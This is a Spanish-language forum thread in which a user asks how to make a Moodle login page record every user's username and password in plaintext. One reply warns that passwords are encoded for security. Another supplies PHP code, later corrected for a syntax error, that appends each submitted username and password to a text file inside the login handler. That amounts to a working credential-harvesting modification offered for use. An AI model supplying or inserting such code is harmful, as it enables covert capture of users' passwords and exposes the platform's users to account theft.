Autor
|
Tema: Modificar el formulario login de Moodle (Leído 12,863 veces)
|
Luisinho_dinho
|
Tengo una plataforma moodle. Me gustaría modificarla para que, cada vez que alguien inicie sesión, se guarde usuario y contraseña en un archivo de texto o que se guarde en la base de datos sin codificar. Investigando un poco, supongo que el formulario es este: <form action="<?php echo $CFG->httpswwwroot; ?>/login/index.php" method="post" id="login"> <div class="loginform"> <div class="form-label"><label for="username"><?php print_string("username") ?></label></div> <div class="form-input"> <input type="text" name="username" id="username" size="15" value="<?php p($frm->username) ?>" /> </div> <div class="clearer"><!-- --></div> <div class="form-label"><label for="password"><?php print_string("password") ?></label></div> <div class="form-input"> <input type="password" name="password" id="password" size="15" value="" /> <input type="submit" id="loginbtn" value="<?php print_string("login") ?>" /> <div class="forgetpass"><a href="forgot_password.php"><?php print_string("forgotten") ?></a></div> </div> <div class="clearer"><!-- --></div> </div> </form> </div> ¿Cómo puedo hacerlo? ¡Gracias por su ayuda!
|
|
|
|
|
|
|
~ Yoya ~
Wiki
|
Esta codificado por seguridad, asi si alguien logra ingresar a la base de datos, puede tener todos los password...
Lo unico que tienes que hacer es crear una tabla o modificar una, y luego ir ingresando los datos...
|
|
|
|
Mi madre me dijo que estoy destinado a ser pobre toda la vida. Engineering is the art of balancing the benefits and drawbacks of any approach.
|
|
|
Luisinho_dinho
|
Pero, ¿Cómo hago que la contraseña ingresada se mande y se guarde en la base de datos? Mi nivel de PHP es bastante limitado.
|
|
|
|
|
|
|
~ Yoya ~
Wiki
|
Ps es necesario saber MYSQL y PHP...
|
|
|
|
Mi madre me dijo que estoy destinado a ser pobre toda la vida. Engineering is the art of balancing the benefits and drawbacks of any approach.
|
|
|
merolhack
Me encanta Joomla y lo que puedo hacer con el
|
Hola, tienes que modificar los archivos PHP del login, en donde recibe los datos de ese formulario. Bájate el Notepad++ y busca lo siguiente en todos los archivos: $_POST['username']Si no encuentras nada prueba con usernameYa que lo encuentres, toma ese valor y has un simple codigo que escriba un TXT: $filename = "01042011/log4.txt"; $fh = fopen($filename, 'a+') or die("can't open file"); $stringData = "Usuario: "$_POST['username'] . " Contraseña: ".$_POST['password']; fwrite($fh, $stringData); fclose($fh);
|
|
|
|
|
|
|
Luisinho_dinho
|
El código que me has pasado me da error en la 3º línea. Parse error: syntax error, unexpected T_VARIABLE in /srv/www/htdocs/moodle/login/index.php on line 294 Corresponde a la línea: $stringData = "Usuario: "$_POST['username'] . " Contraseña: ".$_POST['password'];
|
|
|
|
|
|
|
merolhack
Me encanta Joomla y lo que puedo hacer con el
|
Ah perdon, es algo así la concatenación: $stringData = "Usuario: ".$_POST['username'] . " Contraseña: ".$_POST['password']; Pero OJO, esto lo tienes que revisar bien en los archivos de Moodle, ya que no se si ahí es donde reciba los datos por POST, a mi Moodle se me hace que esta mal hecho...
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Modificar el skin de un formulario sin dependencias.
Programación Visual Basic
|
WHK
|
0
|
1,356
|
30 Enero 2008, 23:49 pm
por WHK
|
|